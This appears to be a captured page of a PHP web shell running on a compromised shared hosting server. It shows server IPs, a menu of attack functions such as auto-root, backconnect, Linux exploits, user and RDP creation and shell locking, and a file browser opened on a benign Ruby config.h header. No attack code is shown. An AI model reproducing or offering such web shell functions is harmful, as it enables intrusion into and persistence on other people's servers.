Linux premium180.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
LiteSpeed
: 162.0.209.168 | : 216.73.216.187
Cant Read [ /etc/named.conf ]
8.3.30
nortrmdp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
opt /
cpanel /
ea-ruby27 /
root /
usr /
include /
ruby /
[ HOME SHELL ]
Name
Size
Permission
Action
backward
[ DIR ]
drwxr-xr-x
assert.h
1.48
KB
-rw-r--r--
backward.h
2.25
KB
-rw-r--r--
config-x86_64.h
12.92
KB
-rw-r--r--
config.h
1.7
KB
-rw-r--r--
debug.h
4.32
KB
-rw-r--r--
defines.h
12.94
KB
-rw-r--r--
digest.h
1.48
KB
-rw-r--r--
encoding.h
17.78
KB
-rw-r--r--
intern.h
57.21
KB
-rw-r--r--
io.h
5.18
KB
-rw-r--r--
missing.h
5.28
KB
-rw-r--r--
onigmo.h
43.61
KB
-rw-r--r--
oniguruma.h
262
B
-rw-r--r--
re.h
1.4
KB
-rw-r--r--
regex.h
777
B
-rw-r--r--
ruby.h
97.17
KB
-rw-r--r--
st.h
7.39
KB
-rw-r--r--
subst.h
374
B
-rw-r--r--
thread.h
1.32
KB
-rw-r--r--
thread_native.h
1.3
KB
-rw-r--r--
util.h
1.84
KB
-rw-r--r--
version.h
1.81
KB
-rw-r--r--
vm.h
1.52
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : config.h
/* * This config.h is a wrapper include file for the original ruby/config.h, * which has been renamed to ruby/config-<arch>.h. There are conflicts for the * original ruby/config.h on multilib systems, which result from arch-specific * configuration options. Please do not use the arch-specific file directly. */ /* * This wrapped is addpated from SDL's one: * http://pkgs.fedoraproject.org/cgit/SDL.git/tree/SDL_config.h */ #ifdef ruby_config_wrapper_h #error "ruby_config_wrapper_h should not be defined!" #endif #define ruby_config_wrapper_h #if defined(__i386__) #include "ruby/config-i386.h" #elif defined(__ia64__) #include "ruby/config-ia64.h" #elif defined(__powerpc64__) #include <endian.h> #if __BYTE_ORDER__ == __ORDER_BIG_ENDIAN__ #include "ruby/config-ppc64.h" #else #include "ruby/config-ppc64le.h" #endif #elif defined(__powerpc__) #include "ruby/config-ppc.h" #elif defined(__s390x__) #include "ruby/config-s390x.h" #elif defined(__s390__) #include "ruby/config-s390.h" #elif defined(__x86_64__) #include "ruby/config-x86_64.h" #elif defined(__arm__) #include "ruby/config-arm.h" #elif defined(__alpha__) #include "ruby/config-alpha.h" #elif defined(__sparc__) && defined (__arch64__) #include "ruby/config-sparc64.h" #elif defined(__sparc__) #include "ruby/config-sparc.h" #elif defined(__aarch64__) #include "ruby/config-aarch64.h" #elif defined(__mips64) && defined(__MIPSEL__) #include "ruby/config-mips64el.h" #elif defined(__mips64) #include "ruby/config-mips64.h" #elif defined(__mips) && defined(__MIPSEL__) #include "ruby/config-mipsel.h" #elif defined(__mips) #include "ruby/config-mips.h" #else #error "The ruby-devel package is not usable with the architecture." #endif #undef ruby_config_wrapper_h
Close